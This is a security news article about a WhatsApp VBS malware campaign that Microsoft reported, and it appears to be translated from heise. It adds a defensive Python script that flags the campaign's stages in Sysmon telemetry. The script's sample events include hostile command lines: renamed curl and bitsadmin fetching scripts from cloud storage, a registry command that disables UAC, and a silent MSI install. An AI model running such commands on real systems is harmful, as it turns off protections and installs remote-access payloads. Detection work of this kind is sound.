WhatsApp malware campaign installs backdoors
Microsoft warns of a malware campaign that delivers malicious software via WhatsApp messages and compromises systems.
Security issues affect WhatsApp Desktop.
(Image: heise medien)
Microsoft has observed a malware campaign in which attackers send VBS files (Visual Basic Script) in WhatsApp messages. If the recipient runs the script, it kicks off a multi-stage infection chain at whose end the attackers have remote access to and a persistent foothold on the system. Users of the WhatsApp desktop client on Windows are particularly exposed, because there the received script can be opened and executed directly on the machine.
In a blog post, Microsoft's Defender security team warns of the campaign, which began at the end of February. The attackers rely on social engineering and living-off-the-land techniques, abusing executables that ship with the operating system (so-called LOLBins) instead of bringing their own tooling. The final payload, an MSI package (Windows Installer), is likewise fetched from cloud storage.
WhatsApp as the entry point of the attack chain
The forensic analysts do not give examples of the observed messages, but explain that the malicious VBS files reach victims as WhatsApp messages, exploiting the trust placed in a familiar communication platform. On execution, the script creates hidden folders under “C:\ProgramData” and places renamed copies of legitimate Windows tools there: “curl.exe” becomes “netapi.dll”, and “bitsadmin.exe” becomes “sc.exe”.
Using these renamed binaries, the malware then downloads further droppers such as “auxs.vbs” and “WinUpdate_KB5034231.vbs” from cloud storage services that are generally regarded as trustworthy, such as AWS S3, Tencent Cloud, or Backblaze B2. According to the Microsoft researchers, this makes the malicious downloads look like legitimate network traffic.
After the download, the malware changes User Account Control settings to weaken the system's defenses by disabling UAC prompts. It repeatedly launches the command prompt “cmd.exe” with a request for elevated privileges until the elevation succeeds or the process is forcibly terminated. By modifying registry entries under “HKLM\Software\Microsoft\Win,” the malicious code anchors itself in the system and survives reboots.
The final stage downloads unsigned MSI installers with names such as Setup.msi, WinRAR.msi, LinkPoint.msi, and AnyDesk.msi. These bundle remote-control software such as AnyDesk and give the attackers persistent remote access, which they can use to exfiltrate data, install further malware, or enlist the compromised machine in a larger network of infected devices, the analysts explain. MSI installers are commonplace in corporate software deployment, so the packages are meant to blend in with routine administration.
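The chain described above lends itself to a simple detection pass over process-creation telemetry, because almost every stage leaves a visible trace: a script host running a .vbs, a binary whose version-info name no longer matches its file name, executables under C:\ProgramData, downloads from cloud storage, UAC policy changes and an msiexec run. The following script is an added example and not code from Microsoft's analysis or from heise. It assumes Sysmon-style process-creation records (Event ID 1) with Image, OriginalFileName and CommandLine fields; the sample events, the hidden folder name “.svc” and the bucket names are constructed, and the cloud host suffixes and the UAC registry values (EnableLUA, ConsentPromptBehaviorAdmin, PromptOnSecureDesktop) are standard names that the article itself does not mention.

```python
"""Detection pass for the WhatsApp VBS -> renamed LOLBin -> cloud download -> MSI chain.

Added example, not from the Microsoft analysis or the article. Input: Sysmon-style
process-creation records (Event ID 1) with Image, OriginalFileName and CommandLine.
The sample events, the folder name ".svc" and the bucket names are constructed.
"""
import ntpath
import re
from urllib.parse import urlparse

# Windows tools the campaign copies under C:\ProgramData with new names (from the article).
LOLBINS = {"curl.exe", "bitsadmin.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Host suffixes for the storage providers named in the article (AWS S3, Tencent Cloud
# COS, Backblaze B2). Assumption: tune this to what your environment legitimately uses.
CLOUD_SUFFIXES = (".amazonaws.com", ".myqcloud.com", ".backblazeb2.com")
# Standard UAC policy values under HKLM\...\Policies\System; the article does not name them.
UAC_VALUES = ("enablelua", "consentpromptbehavioradmin", "promptonsecuredesktop")
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
MSI_RE = re.compile(r"\S+\.msi\b", re.I)


def analyze(event):
    """Return a list of 'stage[:detail]' findings for one process-creation event."""
    image = event.get("Image", "")
    name = ntpath.basename(image).lower()
    orig = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    findings = []
    # Stage 1: a script host executing a .vbs (the WhatsApp attachment).
    if name in SCRIPT_HOSTS and ".vbs" in cmd.lower():
        findings.append("vbs_script_host")
    # Stage 2: the PE's version-info name disagrees with its on-disk name.
    if orig in LOLBINS and name != orig:
        findings.append(f"renamed_lolbin:{orig}->{name}")
    # Stage 2b: anything executing out of the staging directory.
    if image.lower().startswith("c:\\programdata\\"):
        findings.append("exec_from_programdata")
    # Stage 3: curl/bitsadmin (whatever they are called now) pulling from cloud storage.
    if orig in LOLBINS:
        for url in URL_RE.findall(cmd):
            host = (urlparse(url).hostname or "").lower()
            if host.endswith(CLOUD_SUFFIXES):
                findings.append(f"cloud_download:{host}")
    # Stage 4: UAC policy tampering through reg.exe.
    if name == "reg.exe" and any(v in cmd.lower() for v in UAC_VALUES):
        findings.append("uac_tamper")
    # Stage 5: msiexec installing a package (the remote-control payload).
    if name == "msiexec.exe":
        m = MSI_RE.search(cmd)
        if m:
            findings.append(f"msi_install:{m.group(0)}")
    return findings


def chain_stages(events):
    """Distinct stages seen across one host's events; several together is the campaign."""
    stages = set()
    for ev in events:
        for finding in analyze(ev):
            stages.add(finding.split(":", 1)[0])
    return sorted(stages)


# Constructed sample telemetry for one infected host, plus one benign curl call.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\invoice.vbs"'},
    {"Image": r"C:\ProgramData\.svc\netapi.dll", "OriginalFileName": "curl.exe",
     "CommandLine": r"netapi.dll -s -o C:\ProgramData\.svc\auxs.vbs https://updates-cdn.s3.amazonaws.com/auxs.vbs"},
    {"Image": r"C:\ProgramData\.svc\sc.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"sc.exe /transfer upd /download /priority normal https://f005.backblazeb2.com/file/upd/WinUpdate_KB5034231.vbs C:\ProgramData\.svc\WinUpdate_KB5034231.vbs"},
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "CommandLine": r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"Image": r"C:\Windows\System32\msiexec.exe", "OriginalFileName": "msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\ProgramData\.svc\AnyDesk.msi /qn"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe https://example.com/health"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ntpath.basename(ev["Image"]), "->", analyze(ev))
    print("stages on host:", chain_stages(SAMPLE_EVENTS))
```

The renamed-LOLBin check is the most robust of these because it does not depend on any file name the attacker chose: the OriginalFileName in the PE version resource stays “curl.exe” no matter what the file on disk is called. The cloud-download rule will fire on legitimate traffic in environments that use these providers, so treat it as corroborating evidence and alert on the combination of stages rather than on any single finding.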
The analysis also contains advice on how IT administrators can protect their networks against such attacks: blocking script hosts on endpoints, monitoring traffic to cloud storage, and raising employee awareness through training.
Users of popular messengers, especially prominent figures, senior officials and politicians, have frequently been targeted by attackers recently. Around the end of last year, cybercriminals used sophisticated social-engineering tactics in attempts to gain access to potential victims' messenger apps and spy on them. Particular caution is therefore advised with messages from unknown senders.
(dmk)